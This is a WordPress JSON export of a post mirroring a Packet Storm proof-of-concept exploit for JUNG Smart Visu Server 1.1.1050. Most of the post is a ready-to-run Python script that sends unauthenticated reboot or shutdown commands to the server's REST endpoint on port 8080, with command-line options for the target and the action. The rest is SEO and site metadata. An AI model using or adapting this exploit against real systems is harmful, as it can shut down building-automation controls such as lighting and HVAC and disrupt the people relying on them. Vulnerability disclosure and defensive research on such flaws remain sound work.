{"id":41049,"date":"2026-02-16T11:45:50","date_gmt":"2026-02-16T11:45:50","guid":{"rendered":"http:\/\/localhost\/?p=41049"},"modified":"2026-02-16T11:45:50","modified_gmt":"2026-02-16T11:45:50","slug":"jung-smart-visu-server-111050-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41049","title":{"rendered":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610"},"content":{"rendered":"

{“lastseen”:”2026-02-16T17:17:17″,”description”:”Proof of concept exploit for a security vulnerability in JUNG Smart Visu Server version 1.1.1050 that allows unauthenticated remote attackers to trigger a system reboot or shutdown via a crafted HTTP POST request to a publicly exposed REST API endpoint…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:215610″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : JUNG Smart Visu Server 1.1.1050 \u2013 Unauthenticated Remote Denial of Service |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.jung-group.com\/en-DE |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/215521\/ \\u0026 \\tZSL-2026-5971\\n \\n [+] Summary : A security vulnerability in JUNG Smart Visu Server version 1.1.1050 allows unauthenticated remote attackers to trigger a system reboot or shutdown via a crafted HTTP POST request to a publicly exposed REST API endpoint.\\n The affected endpoint fails to enforce authentication and authorization controls, permitting direct execution of critical system control commands. \\n \\t\\t\\t\\t An attacker with network access to the device (default port 8080) can send a single request to disrupt availability, resulting in a denial of service (DoS).\\n Successful exploitation may cause service interruption in building automation environments, potentially affecting lighting, HVAC, and other connected control systems.\\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import sys\\n import argparse\\n \\n ENDPOINT = \\”\/rest\/items\/liteserver_LiteServer_1_systemControl\\”\\n HEADERS = {\\n \\”User-Agent\\”: \\”thricer-engine\/1.6\\”,\\n \\”Content-Type\\”: \\”application\/json\\”\\n }\\n \\n COMMANDS = {\\n \\”reboot\\”: ‘{\\”MSG_ID_TYPE\\”:\\”MSG_REBOOT_REQ\\”}’,\\n \\”shutdown\\”: ‘{\\”MSG_ID_TYPE\\”:\\”MSG_HALT_REQ\\”}’\\n }\\n \\n def exploit(target_ip, command_type):\\n \\”\\”\\”\\n Sends the malicious request to the target server.\\n \\”\\”\\”\\n url = f\\”http:\/\/{target_ip}:8080{ENDPOINT}\\”\\n payload = COMMANDS.get(command_type)\\n \\n if not payload:\\n print(\\”[!] Invalid command type. Use ‘reboot’ or ‘shutdown’.\\”)\\n sys.exit(1)\\n \\n print(f\\”[*] Targeting: {url}\\”)\\n print(f\\”[*] Command: {command_type.upper()}\\”)\\n print(\\”[*] Sending malicious packet…\\”)\\n \\n try:\\n response = requests.post(url, headers=HEADERS, data=payload, timeout=5)\\n if response.status_code == 200:\\n print(\\”[+] Request sent successfully!\\”)\\n print(\\”[+] If the device is connected, it should be rebooting\/shutting down now.\\”)\\n else:\\n print(f\\”[?] Unexpected server response: Status Code {response.status_code}\\”)\\n print(\\”[?] The device might already be down or unaffected.\\”)\\n \\n except requests.exceptions.ConnectionError:\\n print(\\”[!] Connection to server failed. Ensure it is running and the IP is correct.\\”)\\n except requests.exceptions.Timeout:\\n print(\\”[!] Request timed out. The server might have already been shut down.\\”)\\n except Exception as e:\\n print(f\\”[!] An unexpected error occurred: {e}\\”)\\n \\n def banner():\\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 JUNG Smart Visu Server 1.1.1050 – DoS Exploit \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n if __name__ == \\”__main__\\”:\\n banner()\\n parser = argparse.ArgumentParser(description=\\”DoS exploit for JUNG Smart Visu Server.\\”)\\n parser.add_argument(\\”target\\”, help=\\”The target server IP address (e.g., 192.168.1.100)\\”)\\n parser.add_argument(\\”action\\”, choices=[\\”reboot\\”, \\”shutdown\\”], \\n help=\\”The action to perform: ‘reboot’ to restart, ‘shutdown’ to stop.\\”)\\n \\n args = parser.parse_args()\\n \\n exploit(args.target, args.action)\\n \\t\\n \\t\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215610″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215610\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-16T17:17:17″,”description”:”Proof of concept exploit for a security vulnerability in JUNG Smart Visu Server version 1.1.1050 that allows unauthenticated remote attackers to trigger a system reboot…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41049","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41049\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-16T17:17:17″,”description”:”Proof of concept exploit for a security vulnerability in JUNG Smart Visu Server version 1.1.1050 that allows unauthenticated remote attackers to trigger a system reboot...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41049\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T11:45:50+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610\",\"datePublished\":\"2026-02-16T11:45:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049\"},\"wordCount\":638,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41049#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049\",\"name\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T11:45:50+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41049\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41049#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41049","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem","og_description":"{“lastseen”:”2026-02-16T17:17:17″,”description”:”Proof of concept exploit for a security vulnerability in JUNG Smart Visu Server version 1.1.1050 that allows unauthenticated remote attackers to trigger a system reboot...","og_url":"https:\/\/zero.redgem.net\/?p=41049","og_site_name":"zero redgem","article_published_time":"2026-02-16T11:45:50+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41049#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41049"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610","datePublished":"2026-02-16T11:45:50+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41049"},"wordCount":638,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41049#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41049","url":"https:\/\/zero.redgem.net\/?p=41049","name":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T11:45:50+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41049#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41049"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41049#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Denial of Service_PACKETSTORM:215610"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41049","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41049"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41049\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}